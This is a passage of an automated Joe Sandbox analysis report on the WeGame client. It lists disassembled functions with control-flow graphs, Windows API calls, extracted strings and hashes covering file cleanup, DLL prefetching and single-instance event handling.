                                                                control_flow_graph 1022 45f9d2-45fb24 call 46e476 call 40f180 call 40bc30 call 40bbd0 memset GetModuleHandleW GetModuleFileNameW PathFindFileNameW call 40bf40 call 40f240 PathFileExistsW 1035 45feb7-45fef8 call 420c80 call 40bbd0 * 3 call 46e420 1022->1035 1036 45fb2a-45fb49 DeleteFileW 1022->1036 1037 45fbe0-45fbef ?get_log_instance@base@@YAPAVILogger@1@XZ 1036->1037 1038 45fb4f-45fb6d ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z ?get_log_instance@base@@YAPAVILogger@1@XZ 1036->1038 1042 45fc45-45fca9 call 40f180 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z MoveFileW 1037->1042 1043 45fbf1-45fbfe 1037->1043 1038->1035 1040 45fb73-45fb80 1038->1040 1040->1035 1051 45fb86-45fbdb call 43df1b call 43f4bb call 43e231 1040->1051 1053 45fd10-45fd19 ?get_log_instance@base@@YAPAVILogger@1@XZ 1042->1053 1054 45fcab-45fcb4 ?get_log_instance@base@@YAPAVILogger@1@XZ 1042->1054 1043->1042 1050 45fc00-45fc40 call 43df1b GetLastError call 43f4bb call 43e231 1043->1050 1050->1042 1051->1035 1056 45fd84-45fdb1 call 40c0b0 PathFileExistsW 1053->1056 1057 45fd1b-45fd28 1053->1057 1060 45fea8-45feb2 call 40bbd0 1054->1060 1061 45fcba-45fcc7 1054->1061 1056->1060 1077 45fdb7-45fdd0 DeleteFileW 1056->1077 1057->1056 1074 45fd2a-45fd7f call 43df1b GetLastError call 43f4bb call 43e231 1057->1074 1060->1035 1061->1060 1078 45fccd-45fd0b call 43df1b 1061->1078 1074->1056 1083 45fdd2-45fdf0 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z ?get_log_instance@base@@YAPAVILogger@1@XZ 1077->1083 1084 45fe49-45fe52 ?get_log_instance@base@@YAPAVILogger@1@XZ 1077->1084 1091 45fe91-45fea3 call 43f4bb call 43e231 1078->1091 1083->1060 1089 45fdf6-45fe03 1083->1089 1084->1060 1087 45fe54-45fe61 1084->1087 1087->1060 1099 45fe63-45fe90 call 43df1b GetLastError 1087->1099 1089->1060 1097 45fe09-45fe3f call 43df1b 1089->1097 1091->1060 1097->1084 1099->1091
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045F9DC
                                                                • memset.VCRUNTIME140(?,00000000,00000208,00000000,?,qbclient.dll,?,?,?,?,?,?,cfg_data.ini), ref: 0045FA50
                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000104,?,?,00000000,?,qbclient.dll,?,?,?,?,?,?,cfg_data.ini), ref: 0045FA66
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,?,00000000,?,qbclient.dll,?,?,?,?,?,?,cfg_data.ini), ref: 0045FA6D
                                                                • PathFindFileNameW.SHLWAPI(?,?,?,00000000,?,qbclient.dll,?,?,?,?,?,?,cfg_data.ini), ref: 0045FA7A
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045FAB3
                                                                • PathFileExistsW.SHLWAPI(?), ref: 0045FB1C
                                                                • DeleteFileW.KERNEL32(?), ref: 0045FB45
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000000), ref: 0045FB5D
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045FB64
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045FBE0
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp,00000639,0048BBC7), ref: 0045FC23
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000000,?,?,.bak), ref: 0045FC6F
                                                                • MoveFileW.KERNEL32(?,?), ref: 0045FCA1
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045FCAB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: File$?get_log_instance@base@@Logger@1@$?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@ModuleNamePathU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@std@@W@std@@$DeleteErrorExistsFindH_prolog3H_prolog3_H_prolog3_catch_HandleLastMoveSimpleString::operator=memset
                                                                • String ID: .bak$[AsyncTask]Delete file fail: %d.$[AsyncTask]Delete file success: %s.$[AsyncTask]Rename file fail: %s - %d.$[AsyncTask]Rename file success: %s.$\devtools_resources.pak$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 4094883167-2965836422
                                                                • Opcode ID: bfad83819ab66e5c14f9623d8507052eb69938219eb2cc8c03df230657ea81f5
                                                                • Instruction ID: 90af98887d71b6b0e79314b576f352c517c8286fb1276a7f604dda09f3a9bdcc
                                                                • Opcode Fuzzy Hash: bfad83819ab66e5c14f9623d8507052eb69938219eb2cc8c03df230657ea81f5
                                                                • Instruction Fuzzy Hash: 61D18071D11218ABDB20EB60CC9ABDE7374AF14705F5004EAE409B7192DB786F89CF99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00464E84 Relevance: 52.8, APIs: 20, Strings: 10, Instructions: 260COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1106 464e84-464ee0 call 46e476 call 461233 call 463a3a call 40bf40 ?PrefetchImage@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z call 40bbd0 1117 464ee2-464eeb ?get_log_instance@base@@YAPAVILogger@1@XZ 1106->1117 1118 464f3b-464f7f call 40bf40 ?PrefetchImage@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z call 40bbd0 1106->1118 1117->1118 1120 464eed-464efa 1117->1120 1126 464f81-464f8a ?get_log_instance@base@@YAPAVILogger@1@XZ 1118->1126 1127 464fda-46501e call 40bf40 ?PrefetchImage@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z call 40bbd0 1118->1127 1120->1118 1125 464efc-464f36 call 43df1b call 43dcb8 call 43e231 1120->1125 1125->1118 1126->1127 1131 464f8c-464f99 1126->1131 1140 465076-4650ba call 40bf40 ?PrefetchImage@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z call 40bbd0 1127->1140 1141 465020-465029 ?get_log_instance@base@@YAPAVILogger@1@XZ 1127->1141 1131->1127 1139 464f9b-464fd5 call 43df1b call 43dcb8 call 43e231 1131->1139 1139->1127 1154 465115-465159 call 40bf40 ?PrefetchImage@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z call 40bbd0 1140->1154 1155 4650bc-4650c5 ?get_log_instance@base@@YAPAVILogger@1@XZ 1140->1155 1141->1140 1144 46502b-46503a 1141->1144 1144->1140 1153 46503c-465071 call 43df1b call 43dcb8 call 43e231 1144->1153 1153->1140 1168 4651b4-4651fa call 462960 ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ ?find_component@Component_mgr@common@ierd_tgp@@QAE?AV?$weak_ptr@UIComponent@common@ierd_tgp@@@std@@ABVcomponent_interface_type@23@@Z call 44c0a1 ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ ?find_component@Component_mgr@common@ierd_tgp@@QAE?AV?$weak_ptr@UIComponent@common@ierd_tgp@@@std@@ABVcomponent_interface_type@23@@Z call 44c0a1 call 46e420 1154->1168 1169 46515b-465164 ?get_log_instance@base@@YAPAVILogger@1@XZ 1154->1169 1155->1154 1158 4650c7-4650d4 1155->1158 1158->1154 1167 4650d6-465110 call 43df1b call 43dcb8 call 43e231 1158->1167 1167->1154 1169->1168 1172 465166-465173 1169->1172 1172->1168 1181 465175-4651af call 43df1b call 43dcb8 call 43e231 1172->1181 1181->1168
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00464E8B
                                                                  • Part of subcall function 00461233: __EH_prolog3_GS.LIBCMT ref: 0046123D
                                                                  • Part of subcall function 00461233: ?is_certificate_open@util_curl_certificate@ierd_tgp@@YA_NXZ.COMMON(00000110,00464E97,00000070,0045A152), ref: 00461242
                                                                  • Part of subcall function 00461233: ?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,00000110,00464E97,00000070,0045A152), ref: 00461256
                                                                  • Part of subcall function 00461233: ?u16_to_loc@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(00000000,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 0046135B
                                                                  • Part of subcall function 00461233: ?u16_to_loc@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(00000000,?,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 00461386
                                                                  • Part of subcall function 00463A3A: __EH_prolog3_GS.LIBCMT ref: 00463A44
                                                                  • Part of subcall function 00463A3A: memset.VCRUNTIME140(?,00000000,00000208,000008D0,00464E9E,00000070,0045A152), ref: 00463A59
                                                                  • Part of subcall function 00463A3A: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00463A6F
                                                                  • Part of subcall function 00463A3A: ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?), ref: 00463A9B
                                                                  • Part of subcall function 00463A3A: ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,?), ref: 00463ACE
                                                                  • Part of subcall function 00463A3A: memset.VCRUNTIME140(?,00000000,00000208,?,?,?,?,?), ref: 00463AFD
                                                                  • Part of subcall function 00463A3A: FindFirstFileW.KERNEL32(?,?,?,00000000,00000208,?,?,?,?,?), ref: 00463B52
                                                                  • Part of subcall function 00463A3A: memset.VCRUNTIME140(?,00000000,0000020A), ref: 00463B86
                                                                  • Part of subcall function 00463A3A: wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?,00000104,?,00000000,0000020A), ref: 00463B9B
                                                                  • Part of subcall function 00463A3A: wcsncat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,00481998,00000103), ref: 00463BAF
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00464EBE
                                                                • ?PrefetchImage@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,00000070,0045A152), ref: 00464ECA
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000070,0045A152), ref: 00464EE2
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00464F59
                                                                • ?PrefetchImage@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,00000070,0045A152), ref: 00464F69
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000070,0045A152), ref: 00464F81
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00464FF8
                                                                • ?PrefetchImage@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,00000070,0045A152), ref: 00465008
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000070,0045A152), ref: 00465020
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00465094
                                                                • ?PrefetchImage@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,00000070,0045A152), ref: 004650A4
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000070,0045A152), ref: 004650BC
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00465133
                                                                • ?PrefetchImage@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,00000070,0045A152), ref: 00465143
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000070,0045A152), ref: 0046515B
                                                                • ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON(00000070,0045A152), ref: 004651BB
                                                                • ?find_component@Component_mgr@common@ierd_tgp@@QAE?AV?$weak_ptr@UIComponent@common@ierd_tgp@@@std@@ABVcomponent_interface_type@23@@Z.COMMON(?,004A8714,00000070,0045A152), ref: 004651CB
                                                                • ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON(?,004A8714,00000070,0045A152), ref: 004651D8
                                                                • ?find_component@Component_mgr@common@ierd_tgp@@QAE?AV?$weak_ptr@UIComponent@common@ierd_tgp@@@std@@ABVcomponent_interface_type@23@@Z.COMMON(?,004A87E4,?,004A8714,00000070,0045A152), ref: 004651E8
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$?get_log_instance@base@@Image@Logger@1@PrefetchSimpleString::operator=Sys_wrapper@common@ierd_tgp@@W@2@@std@@@$H_prolog3_memset$?find_component@?get_comp_mgr_instance@common@ierd_tgp@@?u16_to_loc@common@ierd_tgp@@Component@common@ierd_tgp@@@std@@Component_mgr@12@Component_mgr@common@ierd_tgp@@D@2@@4@@D@std@@FileU?$char_traits@V123@V?$allocator@V?$basic_string@V?$weak_ptr@Vcomponent_interface_type@23@@W@2@@std@@$?filename@path@filesystem@ierd_tgp@@?get_workingdir_path_ex@?is_certificate_open@util_curl_certificate@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@Application@common@ierd_tgp@@FindFirstH_prolog3ModuleNameVpath@filesystem@3@wcsncat_swcsncpy_s
                                                                • String ID: PrefetchImage TPFCustom.dll failed$PrefetchImage TenioTPF.dll failed$PrefetchImage common.dll failed$PrefetchImage wgcore.dll failed$common.dll$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$feature_module.dll$tcls\tenio\TPFCustom.dll$tcls\tenio\TenioTPF.dll$wgcore.dll
                                                                • API String ID: 1643409868-401443593
                                                                • Opcode ID: 7643b8c45505d1e75799347f8ae237ea0f43999411622676debdac4a9498c695
                                                                • Instruction ID: cfe395b59c3ad149c8ef488b7c275038d9cd6ac86d690611260e9a72f288cf54
                                                                • Opcode Fuzzy Hash: 7643b8c45505d1e75799347f8ae237ea0f43999411622676debdac4a9498c695
                                                                • Instruction Fuzzy Hash: B8A18270E416089BCB14FFA5C892AEEB7B0AF14718F24411FE451772D2EB785A05CB9D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD25922 Relevance: 47.6, APIs: 19, Strings: 8, Instructions: 397synchronizationwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1191 6bd25922-6bd25a1b __EH_prolog3_GS ?current_path@filesystem@ierd_tgp@@YA?AVpath@12@XZ call 6bd27226 call 6bd27457 call 6bd274b1 1198 6bd25a1f-6bd25a36 1191->1198 1199 6bd25a1d 1191->1199 1200 6bd25a39-6bd25a3e 1198->1200 1199->1198 1200->1200 1201 6bd25a40-6bd25abc call 6bd0a8f0 call 6bd25892 call 6bd0a3a0 * 2 call 6bd0a8f0 call 6bd25892 1200->1201 1213 6bd25ac1-6bd25b20 call 6bd0a3a0 call 6bd254ea call 6bd5f4d4 call 6bd0a280 1201->1213 1222 6bd25b26 1213->1222 1223 6bd25bfc-6bd25c47 ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z CreateEventA 1213->1223 1224 6bd25b2c-6bd25b45 1222->1224 1225 6bd25e44-6bd25e5e call 6bd0a3a0 call 6be22e30 1223->1225 1226 6bd25c4d-6bd25c75 WaitForSingleObject 1223->1226 1227 6bd25b49-6bd25b4e 1224->1227 1228 6bd25ca6-6bd25d10 ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z CreateEventA ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z OpenEventA 1226->1228 1229 6bd25c77-6bd25ca1 1226->1229 1227->1227 1231 6bd25b50-6bd25b95 call 6bd0a8f0 call 6bd21990 call 6bd0a3a0 1227->1231 1233 6bd25d12-6bd25d1a SetEvent CloseHandle 1228->1233 1234 6bd25d20-6bd25dba GetCommandLineW call 6bd19a8e ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z FindWindowA IsWindow 1228->1234 1232 6bd25e35-6bd25e3f call 6bd263b2 1229->1232 1261 6bd25b98-6bd25b9d 1231->1261 1232->1225 1233->1234 1244 6bd25dd7-6bd25de6 WaitForSingleObject 1234->1244 1245 6bd25dbc-6bd25dc3 1234->1245 1248 6bd25e61-6bd25e76 call 6bd257a1 1244->1248 1249 6bd25de8-6bd25ded 1244->1249 1245->1244 1247 6bd25dc5-6bd25dd1 SendMessageA 1245->1247 1247->1244 1259 6bd25e8d-6bd25e96 _CxxThrowException 1248->1259 1252 6bd25df3-6bd25e30 call 6bd0a3a0 * 2 call 6bd1d276 call 6bd0a3a0 * 2 1249->1252 1253 6bd25e78-6bd25e88 call 6bd25842 1249->1253 1252->1232 1253->1259 1261->1261 1263 6bd25b9f-6bd25bea call 6bd0a8f0 call 6bd24c9c call 6bd0a3a0 1261->1263 1263->1224 1276 6bd25bf0-6bd25bf6 1263->1276 1276->1223
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD2592C
                                                                • ?current_path@filesystem@ierd_tgp@@YA?AVpath@12@XZ.COMMON(?,000000D4,6BD24672,?,?,?,?,?,?,?,00000001,?,6BD25055,?,?,?), ref: 6BD25998
                                                                  • Part of subcall function 6BD60FFE: __EH_prolog3.LIBCMT ref: 6BD61005
                                                                  • Part of subcall function 6BD60FFE: ?current_path@filesystem@ierd_tgp@@YA?AVpath@12@AAVerror_code@std@@@Z.COMMON(?,00000000,0000000C,6BD5FDE7,?), ref: 6BD61021
                                                                  • Part of subcall function 6BD27226: __EH_prolog3_GS.LIBCMT ref: 6BD2722D
                                                                  • Part of subcall function 6BD27226: GetModuleFileNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000024,6BD2733A,6BD43A1D,00000004,6BD574D1,?,?,?,?,?,?), ref: 6BD2727C
                                                                  • Part of subcall function 6BD27457: __EH_prolog3_GS.LIBCMT ref: 6BD2745E
                                                                  • Part of subcall function 6BD274B1: __EH_prolog3_GS.LIBCMT ref: 6BD274B8
                                                                  • Part of subcall function 6BD274B1: ?gen_id_by_name@common@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV34@0@Z.COMMON(?,?,?,B15238A8-2061-4a6e-AB8D-F2533B92D794,00000024,00000024,6BD25A0E,?,?,?,?,?,000000D4,6BD24672,?,?), ref: 6BD274F9
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON(?,loop_event_name,?), ref: 6BD25C08
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?), ref: 6BD25C33
                                                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 6BD25C62
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON(?,ZOMBIE-IERD-TGP-31F73356-9B60-ABCD-9FF0-F27E3A9BBEC2), ref: 6BD25CB2
                                                                  • Part of subcall function 6BDCDB10: __EH_prolog3_GS.LIBCMT ref: 6BDCDB17
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6BD25CD7
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON(?,31F73356-9B60-4B52-9FF0-F27E3A9BBEC2), ref: 6BD25CE8
                                                                  • Part of subcall function 6BDCDB10: ?get_prefix@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,?,0000003C,6BD25C0D,?,loop_event_name,?), ref: 6BDCDB88
                                                                • OpenEventA.KERNEL32(001F0003,00000000,?), ref: 6BD25D06
                                                                • SetEvent.KERNEL32(00000000), ref: 6BD25D13
                                                                • CloseHandle.KERNEL32(00000000), ref: 6BD25D1A
                                                                • GetCommandLineW.KERNEL32 ref: 6BD25D20
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,00000000), ref: 6BD25D5A
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON(?,TGP_EXTERNAL_MESSAGE_RECEIVER,?,?,00000000), ref: 6BD25D8C
                                                                • FindWindowA.USER32(Static,?), ref: 6BD25DA9
                                                                • IsWindow.USER32(00000000), ref: 6BD25DB2
                                                                • SendMessageA.USER32(00000000,0000004A,00000000,?), ref: 6BD25DD1
                                                                • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BD25DE2
                                                                • _CxxThrowException.VCRUNTIME140(?,6C03D4D4,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BD25E91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$H_prolog3_$?get_coexist_name@util_multi_instance@ierd_tgp@@Event$?current_path@filesystem@ierd_tgp@@CreateObjectSingleVpath@12@WaitWindow$?gen_id_by_name@common@ierd_tgp@@?get_prefix@util_multi_instance@ierd_tgp@@?u16to8@common@ierd_tgp@@CloseCommandD@2@@4@@ExceptionFileFindH_prolog3HandleLineMessageModuleNameOpenSendThrowU?$char_traits@_V34@0@V?$allocator@_V?$basic_string@_Verror_code@std@@@W@2@@std@@W@std@@
                                                                • String ID: -launcher$0/#v$31F73356-9B60-4B52-9FF0-F27E3A9BBEC2$Static$TGP_EXTERNAL_MESSAGE_RECEIVER$WeGameCN_Mutex$ZOMBIE-IERD-TGP-31F73356-9B60-ABCD-9FF0-F27E3A9BBEC2$loop_event_name
                                                                • API String ID: 1962669088-394409108
                                                                • Opcode ID: b20cc089975a376e6f5c5509c0a5dad9745c6d00de1ea65f857118a3b8be1dc5
                                                                • Instruction ID: 02ded6c0724c5e53cd5137bb24a75a93a22b0c2dbe80af2806801c468272a2e6
                                                                • Opcode Fuzzy Hash: b20cc089975a376e6f5c5509c0a5dad9745c6d00de1ea65f857118a3b8be1dc5
                                                                • Instruction Fuzzy Hash: 09028A71805299EEDB15CFB8C840BDDBBB4BF19308F108199D149AB251DB78AA49CF62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDBDA53 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 167COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
